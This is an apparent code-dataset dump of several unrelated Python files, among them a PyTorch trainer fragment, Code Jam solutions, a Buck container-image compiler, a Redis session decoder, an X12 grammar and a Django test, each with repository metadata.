logits0 = self.model.forward_partition(inputs)
logits0 = self.ss_classifier(logits0)
loss0 = self.loss_func(logits0, self.partition_labels)
'''
logits = self.model.forward_aux(inputs, target=None, train_idx= idx_unlabeled, mixup_input= False, mixup_hidden = False, mixup_alpha = 0.0,layer_mix=None)
logits = torch.log_softmax(logits, dim=-1)
loss_usup = -torch.mean(torch.sum(target[idx_unlabeled] * logits[idx_unlabeled], dim=-1))
return loss, loss_usup, loss0
def evaluate(self, inputs, target, idx):
if self.opt['cuda']:
inputs = inputs.cuda()
target = target.cuda()
idx = idx.cuda()
self.model.eval()
logits = self.model(inputs)
loss = self.criterion(logits[idx], target[idx])
preds = torch.max(logits[idx], dim=1)[1]
correct = preds.eq(target[idx]).double()
accuracy = correct.sum() / idx.size(0)
return loss.item(), preds, accuracy.item()
def predict(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def predict_noisy_aux(self, inputs, tau=1):
if self.opt['cuda']:
inputs = inputs.cuda()
#self.model.eval()
logits = self.model.forward_aux(inputs) / tau
logits = torch.softmax(logits, dim=-1).detach()
return logits
def save(self, filename):
params = {
'model': self.model.state_dict(),
'optim': self.optimizer.state_dict()
}
try:
torch.save(params, filename)
except BaseException:
print("[Warning: Saving failed... continuing anyway.]")
def load(self, filename):
try:
checkpoint = torch.load(filename)
except BaseException:
print("Cannot load model from {}".format(filename))
exit()
self.model.load_state_dict(checkpoint['model'])
self.optimizer.load_state_dict(checkpoint['optim'])
|
[
"[email protected]"
] | |
fa3e535aaacaa3dafcb031f0333a8778da9d2e30
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_97/1531.py
|
9246536e333923658ae3a6c8448940cb36f0d831
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,052 |
py
|
def check(x, mn, mx):
global pairs
pcheck = []
x = str(x)
if len(x) == 1:
pass
if len(x) == 2:
if x[0] != x[1]:
first = x[::-1]
if int(first) > int(x):
pcheck.append(int(first))
if len(x) == 3:
second = x[1:]+x[0]
third = x[-1]+x[0:-1]
if second != x and second[0] != '0' and int(second) > int(x):
pcheck.append(int(second))
if third != x and third[0] != '0' and int(third) > int(x):
pcheck.append(int(third))
for item in pcheck:
if item >= mn and item <= mx:
pairs += 1
def recycle(numbers):
global pairs
pairs = 0
parameters = numbers.split()
for x in range(int(parameters[0]), int(parameters[1])+1):
check(x,int(parameters[0]),int(parameters[1]))
testcases.append(pairs)
testcases = []
pairs = 0
f = file('C-small-attempt2.in', 'r')
for line in f:
if len(line.split()) > 1:
recycle(line)
f.close()
f1 = file('outputC.txt', 'w')
for x in range(1, len(testcases)+1):
f1.write("Case #"+str(x)+": "+str(testcases[x-1])+'\n')
f1.close()
|
[
"[email protected]"
] | |
d44c38b442f4ea146ddaa3080d9f72ed2c617fa8
|
025c1cc826722d558d43854f3e319917e199d609
|
/infra_macros/macro_lib/convert/container_image/compiler/compiler.py
|
6cfddefcce8817aa2d14a9321c253ab846c2820a
|
[
"BSD-3-Clause"
] |
permissive
|
martarozek/buckit
|
73440be29a2ce64084016fc395a5a8cc9bc1e602
|
343cc5a5964c1d43902b6a77868652adaefa0caa
|
refs/heads/master
| 2020-03-26T06:07:35.468491 | 2018-08-12T17:34:04 | 2018-08-12T17:45:46 | 144,590,545 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,345 |
py
|
#!/usr/bin/env python3
'''
This is normally invoked by the `image_layer` Buck macro converter.
This compiler builds a btrfs subvolume in
<--subvolumes-dir>/<--subvolume-name>:<subvolume-version>
To do so, it parses `--child-feature-json` and the `--child-dependencies`
that referred therein, creates `ImageItems`, sorts them in dependency order,
and invokes `.build()` to apply each item to actually construct the subvol.
'''
import argparse
import itertools
import os
import subprocess
import sys
from subvol_utils import Subvol
from .dep_graph import dependency_order_items
from .items import gen_parent_layer_items
from .items_for_features import gen_items_for_features
from .subvolume_on_disk import SubvolumeOnDisk
# At the moment, the target names emitted by `image_feature` targets seem to
# be normalized the same way as those provided to us by `image_layer`. If
# this were to ever change, this would be a good place to re-normalize them.
def make_target_filename_map(targets_followed_by_filenames):
'Buck query_targets_and_outputs gives us `//target path/to/target/out`'
if len(targets_followed_by_filenames) % 2 != 0:
raise RuntimeError(
f'Odd-length --child-dependencies {targets_followed_by_filenames}'
)
it = iter(targets_followed_by_filenames)
d = dict(zip(it, it))
# A hacky check to ensures that the target corresponds to the path. We
# can remove this if we absolutely trust the Buck output.
if not all(
t.replace('//', '/').replace(':', '/') in f for t, f in d.items()
):
raise RuntimeError(f'Not every target matches its output: {d}')
return d
def parse_args(args):
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawTextHelpFormatter,
)
parser.add_argument(
'--subvolumes-dir', required=True,
help='A directory on a btrfs volume to store the compiled subvolume '
'representing the new layer',
)
parser.add_argument(
'--subvolume-name', required=True,
help='The first part of the subvolume directory name',
)
parser.add_argument(
'--subvolume-version', required=True,
help='The second part of the subvolume directory name',
)
parser.add_argument(
'--parent-layer-json',
help='Path to the JSON output of the parent `image_layer` target',
)
parser.add_argument(
'--child-layer-target', required=True,
help='The name of the Buck target describing the layer being built',
)
parser.add_argument(
'--child-feature-json', required=True,
help='The path of the JSON output of the `image_feature` that was '
'auto-generated for the layer being built',
)
parser.add_argument(
'--child-dependencies',
nargs=argparse.REMAINDER, metavar=['TARGET', 'PATH'], default=(),
help='Consumes the remaining arguments on the command-line, with '
'arguments at positions 1, 3, 5, 7, ... used as Buck target names '
'(to be matched with the targets in per-feature JSON outputs). '
'The argument immediately following each target name must be a '
'path to the output of that target on disk.',
)
return parser.parse_args(args)
def build_image(args):
subvol = Subvol(os.path.join(
args.subvolumes_dir,
f'{args.subvolume_name}:{args.subvolume_version}',
))
for item in dependency_order_items(
itertools.chain(
gen_parent_layer_items(
args.child_layer_target,
args.parent_layer_json,
args.subvolumes_dir,
),
gen_items_for_features(
[args.child_feature_json],
make_target_filename_map(args.child_dependencies),
),
)
):
item.build(subvol)
try:
return SubvolumeOnDisk.from_subvolume_path(
subvol.path().decode(),
args.subvolumes_dir,
args.subvolume_name,
args.subvolume_version,
)
except Exception as ex:
raise RuntimeError(f'Serializing subvolume {subvol.path()}') from ex
if __name__ == '__main__': # pragma: no cover
build_image(parse_args(sys.argv[1:])).to_json_file(sys.stdout)
|
[
"[email protected]"
] | |
3de5136de3696c4e49370d8ef3420a67e721f6b3
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_149/82.py
|
0c7ae5570829193e068ba4471f6d4bad7fb4b56a
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 279 |
py
|
#!/usr/bin/env python
import itertools
def solve(a):
ans=0
while a:
x=min(a)
i=a.index(x)
del a[i]
ans+=min(i,len(a)-i)
return ans
for t in xrange(1,1+int(raw_input())):
n=int(raw_input())
a=map(int,raw_input().split())
ans=solve(a)
print"Case #%d:"%t,
print ans
|
[
"[email protected]"
] | |
8cfbe05b9aeb068e2eea79df986d823110f9c019
|
899bac17acf97252a33d91af076ff1f16b975210
|
/eduiddashboard/scripts/decode_session.py
|
787b570f274e635d56156b7461f3b6945ebfead4
|
[] |
no_license
|
isabella232/eduid-dashboard
|
91a209f7833f26a7949cecec60df2e501a82f840
|
99cffaa90f41b13ec34f9d057f19630c644df6ee
|
refs/heads/master
| 2023-03-16T05:19:36.184687 | 2018-07-27T12:27:53 | 2018-07-27T12:27:53 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,090 |
py
|
# -*- coding: utf-8 -*-
import sys
import pprint
from pyramid.paster import bootstrap
from eduid_common.session.session import SessionManager
import logging
logger = logging.getLogger(__name__)
__author__ = 'ft'
"""
Read and decode a session from Redis. Supply the token (id starting with lower-case 'a')
from an existing session.
"""
default_config_file = '/opt/eduid/eduid-dashboard/etc/eduid-dashboard.ini'
def main(token):
env = bootstrap(default_config_file)
settings = env['request'].registry.settings
secret = settings.get('session.secret')
manager = SessionManager(cfg = settings, ttl = 3600, secret = secret)
session = manager.get_session(token = token)
print('Session: {}'.format(session))
print('Data:\n{}'.format(pprint.pformat(dict(session))))
return True
if __name__ == '__main__':
try:
if len(sys.argv) != 2:
print('Syntax: decode_session.py aTOKEN')
sys.exit(1)
res = main(sys.argv[1])
if res:
sys.exit(0)
sys.exit(1)
except KeyboardInterrupt:
pass
|
[
"[email protected]"
] | |
ea2f5c0278cf81ce6a961011b597677d80605caa
|
c6588d0e7d361dba019743cacfde83f65fbf26b8
|
/x12/5030/240005030.py
|
e169346e38e95704c267b8fa6401b8abee37c150
|
[] |
no_license
|
djfurman/bots-grammars
|
64d3b3a3cd3bd95d625a82204c3d89db6934947c
|
a88a02355aa4ca900a7b527b16a1b0f78fbc220c
|
refs/heads/master
| 2021-01-12T06:59:53.488468 | 2016-12-19T18:37:57 | 2016-12-19T18:37:57 | 76,887,027 | 0 | 0 | null | 2016-12-19T18:30:43 | 2016-12-19T18:30:43 | null |
UTF-8
|
Python
| false | false | 1,585 |
py
|
from bots.botsconfig import *
from records005030 import recorddefs
syntax = {
'version' : '00403', #version of ISA to send
'functionalgroup' : 'MZ',
}
structure = [
{ID: 'ST', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGN', MIN: 1, MAX: 1},
{ID: 'N1', MIN: 0, MAX: 99999, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
]},
{ID: 'LX', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'N1', MIN: 0, MAX: 1, LEVEL: [
{ID: 'N2', MIN: 0, MAX: 2},
{ID: 'N3', MIN: 0, MAX: 2},
{ID: 'N4', MIN: 0, MAX: 1},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'NTE', MIN: 0, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
{ID: 'L11', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'MS2', MIN: 0, MAX: 99999},
{ID: 'LS', MIN: 0, MAX: 1, LEVEL: [
{ID: 'MAN', MIN: 1, MAX: 99999, LEVEL: [
{ID: 'L11', MIN: 0, MAX: 99999},
{ID: 'AT7', MIN: 0, MAX: 99999},
{ID: 'CD3', MIN: 0, MAX: 99999},
{ID: 'NM1', MIN: 0, MAX: 1},
{ID: 'Q7', MIN: 0, MAX: 99999},
]},
{ID: 'LE', MIN: 1, MAX: 1},
]},
{ID: 'EFI', MIN: 0, MAX: 1, LEVEL: [
{ID: 'BIN', MIN: 1, MAX: 1},
]},
]},
]},
{ID: 'SE', MIN: 1, MAX: 1},
]}
]
|
[
"[email protected]"
] | |
c70a779cc10fd3ba3fe7aca2d9736f9bcb91c53f
|
d594f3926f6379ef7c382c608cb211f507240420
|
/csunplugged/tests/utils/errors/test_ThumbnailPageNotFoundError.py
|
b73009b6a4421c213fecea7a8dec041baac543c4
|
[
"LicenseRef-scancode-secret-labs-2011",
"MIT",
"OFL-1.1",
"LGPL-2.0-or-later",
"AGPL-3.0-only",
"CC-BY-4.0",
"Apache-2.0",
"BSD-3-Clause",
"CC-BY-SA-4.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
uccser/cs-unplugged
|
0b9151f84dd490d5b90771a3706327a623d39edc
|
363e281ff17cefdef0ec61078b1718eef2eaf71a
|
refs/heads/develop
| 2023-08-25T08:45:29.833025 | 2023-08-22T02:58:35 | 2023-08-22T02:58:35 | 66,315,075 | 200 | 41 |
MIT
| 2023-09-14T02:15:40 | 2016-08-22T23:16:40 |
Python
|
UTF-8
|
Python
| false | false | 958 |
py
|
"""Test class for ThumbnailPageNotFoundError error."""
from django.test import SimpleTestCase
from utils.errors.ThumbnailPageNotFoundError import ThumbnailPageNotFoundError
from unittest.mock import Mock
class ThumbnailPageNotFoundErrorTest(SimpleTestCase):
"""Test class for ThumbnailPageNotFoundError error.
Note: Tests to check if these were raised appropriately
are located where this exception is used.
"""
def test_attributes(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(exception.generator_name, "Name")
def test_string(self):
generator = Mock()
generator.__class__.__name__ = "Name"
exception = ThumbnailPageNotFoundError(generator)
self.assertEqual(
exception.__str__(),
"Name did not return a page with a designated thumbnail."
)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.